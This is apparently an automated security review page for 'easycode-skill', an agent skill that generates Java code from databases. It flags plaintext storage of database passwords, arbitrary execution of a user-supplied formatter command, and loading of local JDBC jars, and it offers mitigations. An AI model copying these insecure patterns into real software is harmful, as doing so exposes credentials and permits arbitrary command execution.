Easycode Skill
PassAudited by VirusTotal on May 11, 2026.
Overview
Type: OpenClaw Skill Name: easycode-skill Version: 1.0.3 The skill bundle provides Java code generation from databases but exhibits high-risk behaviors. Specifically, 'scripts/easycode_skill.py' stores database credentials (including passwords) in plaintext within a local '.easycode-skill/state.json' file and allows for arbitrary command execution through the 'project_format_command' field in the '_run_project_formatter' function. While these features support the stated purpose of code generation and formatting, the lack of credential encryption and the direct execution of user-supplied strings represent significant security vulnerabilities. No evidence of intentional data exfiltration or malicious backdoors was found.
Findings (0)
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
The agent can connect to the specified database and read schema, table, column, and comment metadata.
The skill uses a database password to connect and read table metadata. This is expected for code generation, but it is still sensitive account access.
String pass = req(a, "pass"); ... DriverManager.getConnection(url, user, pass)
Use a least-privilege, read-only database account and avoid production credentials unless necessary.
A database password or connection details could remain on disk and be exposed to anyone or anything that can read the project directory.
The visible code writes state to a local JSON file. SKILL.md also says interactive mode persists `pass`, so database passwords may be retained locally unless other omitted code encrypts or removes them.
STATE_DIR = Path(".easycode-skill") ... STATE_FILE = STATE_DIR / "state.json" ... json.dump(state, f, ensure_ascii=False, indent=2)Before using interactive mode, verify whether passwords are scrubbed or stored in a real secret manager; otherwise avoid saving passwords and delete `.easycode-skill/state.json` if sensitive data is present.
A formatter command can modify the project or run arbitrary local build actions under the user's account.
The skill can run user-specified local commands after generating files. That is useful for formatting, but it is a broad execution capability if populated with unsafe commands.
"project_format_command": { ... "description": "Optional formatter command(s) executed in project_root after generation, e.g. './gradlew spotlessApply'" }Only enable formatter execution for commands you recognize, and review the generation plan before allowing file writes or formatting.
A compromised or untrusted JDBC driver jar could run code when the Java bridge loads it.
The skill locates JDBC driver jars from local skill and Maven repository paths. Loading local jars is expected for JDBC metadata, but users should trust those jars.
"patterns": ["{skill_root}/drivers/mysql/*.jar", "{home}/.m2/repository/com/mysql/mysql-connector-j/*/mysql-connector-j-*.jar", ...]Use official JDBC drivers from trusted repositories and avoid passing unknown `driver_jar` paths.